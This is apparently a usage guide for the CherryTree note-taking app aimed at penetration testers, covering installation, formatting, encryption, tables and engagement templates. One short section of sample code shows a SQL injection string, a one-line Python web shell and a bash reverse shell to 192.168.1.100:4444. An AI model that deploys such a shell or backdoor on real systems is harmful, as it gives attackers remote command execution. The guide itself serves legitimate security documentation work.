CherryTree

Overview

CherryTree is a powerful hierarchical note-taking application designed for organizing complex information, particularly popular among security professionals for documenting penetration testing engagements, vulnerability research, and incident response activities. It combines a tree-based organizational structure with rich text formatting, code highlighting, and strong encryption capabilities.

Installation

Linux Installation

# Ubuntu/Debian
sudo apt-get install cherrytree

# Fedora/RHEL
sudo dnf install cherrytree

# Arch Linux
sudo pacman -S cherrytree

# Build from source
git clone https://github.com/giuspen/cherrytree.git
cd cherrytree
mkdir -p build && cd build
cmake ..
make
sudo make install

macOS Installation

# Homebrew installation
brew install cherrytree

# Download from GitHub
wget https://github.com/giuspen/cherrytree/releases/download/*/cherrytree-*.dmg
# Open .dmg and drag to Applications

# Manual installation
git clone https://github.com/giuspen/cherrytree.git
cd cherrytree
mkdir build && cd build
cmake ..
make

Windows Installation

# Download installer from GitHub
# https://github.com/giuspen/cherrytree/releases

# Portable version
# Download cherrytree-*-portable.zip
# Extract and run cherrytree.exe

# Chocolatey
choco install cherrytree

# Scoop
scoop install cherrytree

Quick Start

Creating Your First Document

# Launch CherryTree
cherrytree

# Create new document (File > New)
# Or command line
cherrytree --new_doc pen-test-notes

Basic Structure for Penetration Testing

Engagement Name (root)
├── Client Information
│   ├── Contact Details
│   └── Scope
├── Reconnaissance
│   ├── OSINT
│   ├── Network Scanning
│   └── Service Enumeration
├── Vulnerability Assessment
│   ├── Findings
│   └── Severity Analysis
├── Exploitation
│   ├── Successful Exploits
│   └── Failed Attempts
└── Reporting
    ├── Executive Summary
    └── Detailed Findings

Node Management

Creating Nodes (Notes)

# Using GUI: Right-click parent > New Child Node
# Or: Ctrl+N (new sibling), Ctrl+Shift+N (new child)

# Node naming conventions for penetration testing
Engagement_Name
├── 2026-04-20_Initial_Scan
├── 2026-04-21_Web_Testing
├── SQLi_Found_on_Login
└── RCE_Vulnerability_DB

Organizing Node Hierarchy

# Drag and drop nodes to reorganize
# Right-click > Cut/Copy/Paste

# Collapse/Expand branches
# Click triangle next to parent node
# Ctrl+comma to collapse all
# Ctrl+period to expand all

# Navigate nodes
# Ctrl+Up/Down arrows - move between nodes
# Ctrl+Left/Right arrows - expand/collapse

Node Properties

# Access node properties
# Right-click node > Properties
# Or: Ctrl+Alt+Return

# Set node as:
# - Rich text (formatted text)
# - Plain text (monospace)
# - Code (syntax highlighting)
# - Table (structured data)

Text Formatting and Rich Content

Basic Text Formatting

# Bold text
Ctrl+B or select text > Format menu

# Italic text
Ctrl+I or select text > Format menu

# Underline text
Ctrl+U or select text > Format menu

# Strikethrough
Ctrl+- or select text > Format menu

# Monospace (code)
Ctrl+E or Format > Monospace

Text Styles

# Large title
Select text > Format > Text Styles > Large Title

# Small title
Select text > Format > Text Styles > Small Title

# Emphasis (highlighted)
Select text > Format > Highlight Text

# Remove formatting
Select text > Format > Remove Formatting

Font and Color

# Change font
Select text > Format > Font Name

# Change font size
Select text > Format > Font Size

# Change text color
Select text > Format > Text Color > Choose color

# Change background color
Select text > Format > Background Color > Choose color

# Predefined colors for severity
# Red for high severity
# Orange for medium
# Yellow for low
# Green for informational

Code and Syntax Highlighting

Inserting Code Blocks

# Create code node
Right-click > Properties > Code

# Or use code markdown
```bash
your code here

Set programming language

In code node: Properties > Syntax highlight > [language]


### Supported Languages

```bash
# Common security-related languages
Languages menu in code properties:
- bash/shell
- python
- php
- sql
- javascript
- html
- xml
- json
- powershell
- sql (mysql, postgresql, mssql)
- c/c++
- java
- ruby
- perl
- go
- rust

Code Examples for Pentest Notes

# SQL Injection Example (marked as SQL)
SELECT * FROM users WHERE id=1 OR '1'='1';

# Web Shell Example (marked as Python)
import os
os.system(request.args.get('cmd'))

# Reverse Shell (marked as Bash)
bash -i >& /dev/tcp/192.168.1.100/4444 0>&1

Tables and Structured Data

Creating Tables

# Create table node
Right-click > Properties > Table

# Or insert table in rich text
Edit > Insert Table

# Specify rows and columns
Table properties dialog
- Set column count: 3
- Set initial rows: 5

Vulnerability Tracking Table

| Host | Service | Vulnerability | Severity | Status |
|------|---------|----------------|----------|--------|
| 10.0.0.50 | HTTP | SQL Injection | High | Exploited |
| 10.0.0.51 | SSH | Weak Crypto | Medium | Noted |
| 10.0.0.52 | FTP | Default Creds | Critical | Escalated |

Finding Documentation Table

| CVE | Service | Affected Version | CVSS | Exploitable | Notes |
|-----|---------|------------------|------|-------------|-------|
| CVE-2024-1234 | Apache | 2.4.49 | 9.8 | Yes | RCE |
| CVE-2024-5678 | OpenSSL | 1.1.1 | 7.5 | Partial | TLS only |

Network Mapping Table

| IP Address | Hostname | OS | Open Ports | Services |
|-----------|----------|----|-----------|----|
| 192.168.1.1 | router | Linux | 22,80,443 | SSH,HTTP,HTTPS |
| 192.168.1.100 | workstation | Windows 10 | 139,445,3389 | SMB,RDP |
| 192.168.1.200 | server | Windows Server 2019 | 3306,5432,1433 | MySQL,PostgreSQL,MSSQL |

Images and Attachments

Inserting Images

# Insert image in rich text node
Edit > Insert Image > Select file

# Supported formats
- PNG, JPEG, GIF, BMP, SVG

# Screenshots for evidence
# Take screenshot > Edit > Insert Image > screenshot.png

# Paste directly
# Paste screenshot > Edit > Paste > Image pasted automatically

Image Organization

# Create Screenshots subdirectory
├── Findings
│   ├── Screenshots
│   │   ├── SQLi_vulnerable_parameter.png
│   │   ├── Admin_panel_found.png
│   │   └── RCE_proof_of_concept.png
│   └── Description

File Attachments

# Attach files
Edit > Attach File

# Browse and select file
# File is embedded in document (increases file size)

# Common attachments
- Nmap XML output
- Burp Suite reports
- Metasploit logs

Security and Encryption

Document Encryption

# Enable password protection
File > Properties > Encrypt

# Set password
Enter strong password (20+ characters recommended)

# Password-protected nodes
Right-click node > Properties > Encrypted

# Automatic lock after inactivity
Edit > Preferences > Security > Lock documents after 10 minutes

Password Management Best Practices

# Use strong password
- 20+ characters
- Mix uppercase, lowercase, numbers, symbols
- Avoid dictionary words

# Password storage
- Use password manager
- Never store password in notes
- Document recovery procedure

# Security implications
- No password recovery once set
- Lost password = lost data
- Regular backups essential

Finding Information

# Search all nodes
Ctrl+F or Edit > Find Text

# Search options
- Match case
- Regular expressions
- Whole words only

# Search results
- Lists matching nodes
- Click result to navigate
- Next/Previous buttons

Advanced Search

# Search with regex
Edit > Find Text > Use Regular Expression

# Examples:
# IP addresses: \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b
# Email addresses: \b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b
# URLs: https?:\/\/[^\s]+
# CVE numbers: CVE-\d{4}-\d{4,}

# Jump to node
Ctrl+G or Edit > Go To

# Tree navigation
Ctrl+Up/Down - previous/next node
Ctrl+Left - parent node
Ctrl+Right - first child

# Home/End
Ctrl+Home - first node
Ctrl+End - last node

Backup and Export

Saving Documents

# Save (Ctrl+S)
File > Save

# Auto-save enabled by default
Edit > Preferences > Autosave

# Save frequency
- Every 1 minute (default)
- Adjustable

Exporting Notes

# Export as HTML
File > Export > HTML (single directory)

# Export as PDF
File > Export > PDF (requires wkhtmltopdf)

# Export as text
File > Export > Text File

# Export specific node
Right-click node > Export

# Export entire tree
File > Export > HTML/PDF/Text

Backup Procedures

# Manual backup
File > Save As > backup-location

# Automated backup script
# Copy CherryTree database
cp ~/.local/share/cherrytree/*.ctd ~/backups/

# Version control
# Use git for important notes
cd notes-directory
git init
git add .
git commit -m "CherryTree backup"

Penetration Testing Workflows

Reconnaissance Documentation

Reconnaissance
├── OSINT Findings
│   ├── Website Information
│   ├── Social Media Profiles
│   ├── Email Addresses
│   └── Technology Stack
├── DNS Enumeration
│   ├── A Records
│   ├── MX Records
│   ├── NS Records
│   └── Subdomain List
└── Public Vulnerability Data
    ├── Previously Published CVEs
    ├── Reported Vulnerabilities
    └── Public Exploits

Vulnerability Tracking

Vulnerabilities
├── Critical Issues
│   ├── [High-Risk-Finding] RCE via Insecure Deserialization
│   │   ├── Proof of Concept
│   │   ├── Evidence (screenshot)
│   │   ├── Remediation
│   │   └── CVSS Score: 9.8
│   └── [Critical] Default Credentials on Admin Panel
├── High Issues
│   └── [SQL Injection] Authentication Bypass
└── Medium Issues
    └── [Weak Cryptography] Hardcoded API Key

Engagement Timeline

Timeline
├── 2026-04-15
│   ├── Client kickoff meeting
│   ├── Scope discussion
│   └── Rules of engagement signed
├── 2026-04-16
│   ├── Reconnaissance phase started
│   ├── Initial network scan
│   └── 12 web applications identified
├── 2026-04-20
│   ├── Critical RCE found
│   ├── Client notified
│   └── Remediation plan provided
└── 2026-04-25
    ├── Re-testing completed
    └── All issues resolved

Custom Templates

Creating Engagement Template

[Template Name: Penetration Test]
Engagement: [CLIENT_NAME]
├── Client Information
│   ├── Primary Contact: [NAME]
│   ├── Email: [EMAIL]
│   └── Phone: [PHONE]
├── Engagement Details
│   ├── Start Date: [DATE]
│   ├── End Date: [DATE]
│   ├── Budget: [AMOUNT]
│   └── Scope: [DESCRIPTION]
├── Findings Summary
│   ├── Total Vulnerabilities: 0
│   ├── Critical: 0
│   ├── High: 0
│   └── Medium: 0
└── Report Template
    ├── Executive Summary
    ├── Detailed Findings
    └── Recommendations

Creating Bug Bounty Template

[Template Name: Bug Bounty Finding]
Vulnerability Report
├── Title: [VULNERABILITY_TYPE]
├── Severity: [CRITICAL|HIGH|MEDIUM|LOW]
├── CVSS Score: [SCORE]
├── Affected Component: [COMPONENT]
├── Proof of Concept
│   ├── Steps to Reproduce
│   ├── Code/Screenshots
│   └── Video Evidence
├── Impact Assessment
│   ├── Confidentiality Impact
│   ├── Integrity Impact
│   └── Availability Impact
├── Remediation
│   └── Suggested Fix
└── References
    └── [CVE/CWE/References]

Advanced Features

Preferences and Customization

# Access preferences
Edit > Preferences

# Text Editor
- Font selection
- Font size
- Tab width
- Auto-indent
- Spell check

# Colors and Theme
- Dark mode
- Light mode
- Custom syntax highlighting

# Behavior
- Auto-save interval
- Tree right/left click behavior
- Node creation defaults

Keyboard Shortcuts

Ctrl+N            - New sibling node
Ctrl+Shift+N      - New child node
Ctrl+D            - Delete node
Ctrl+U            - Move node up
Ctrl+Shift+U      - Move node down
Ctrl+L            - Move node left (decrease level)
Ctrl+R            - Move node right (increase level)
Ctrl+F            - Find text
Ctrl+H            - Replace text
Ctrl+B            - Bold
Ctrl+I            - Italic
Ctrl+U            - Underline
Ctrl+E            - Monospace
Ctrl+S            - Save

Document Statistics

# View document information
File > Document Statistics

# Displays:
- Total nodes
- Total links
- Total images
- Document size
- Last modified date

Tips and Best Practices

Organization Strategy

# Use consistent naming
- Prefix with date: 2026-04-15_Task_Name
- Use underscores instead of spaces
- Descriptive titles

# Deep hierarchy (good for complex engagements)
# Shallow hierarchy (good for quick reference)
# Mixed approach (recommended)

# Color-code nodes
# Use node icons for quick visual identification

Security Practices

# Encrypt sensitive documents
# Use strong passwords
# Regular backups to encrypted location
# Never leave unencrypted notes on shared systems
# Clean temporary files after export

Productivity Tips

# Use templates for recurring tasks
# Create quick-reference nodes
# Link related findings together
# Use tables for structured data
# Regular review and archival

# Engagement close-out
# Archive completed engagement documents
# Export final reports
# Update lessons learned

Integration with Other Tools

Copying from Nmap Output

# Copy nmap results
nmap -sV target > nmap-results.txt

# Paste into CherryTree code node
# Paste formatted output
# Set syntax highlighting to 'text'

Importing Burp Suite Reports

# Export from Burp as HTML
# Copy relevant findings
# Paste into appropriate nodes
# Add custom analysis and notes

# Or save findings in table format
| Issue | Severity | Confidence | Details |
|-------|----------|------------|---------|

Metasploit Integration

# Export module information
msfconsole > hosts
msfconsole > services

# Copy output to CherryTree
# Use code blocks for commands
# Document successful exploits

Troubleshooting

File Corruption

# Check file integrity
file ~/.local/share/cherrytree/*.ctd

# Recover from backup
cp ~/backups/document.ctd ~/.local/share/cherrytree/

# Export and reimport
File > Export > HTML
# Create new document
# Manually copy content back

Performance Issues

# Large documents may slow down
# Break into multiple documents
# Archive old engagements

# Clear cache
rm -rf ~/.cache/cherrytree/

# Restart application
# Reduce image/attachment size

Password Recovery

# No built-in password recovery
# If password lost, document is inaccessible
# Prevention:
# - Store password in password manager
# - Create recovery procedure
# - Test recovery regularly
# - Backup before encrypting

Conclusion

CherryTree provides a flexible, secure platform for organizing complex security research and penetration testing documentation. Its hierarchical structure, rich formatting options, and encryption capabilities make it an essential tool in the security professional’s toolkit for evidence collection, findings documentation, and engagement management.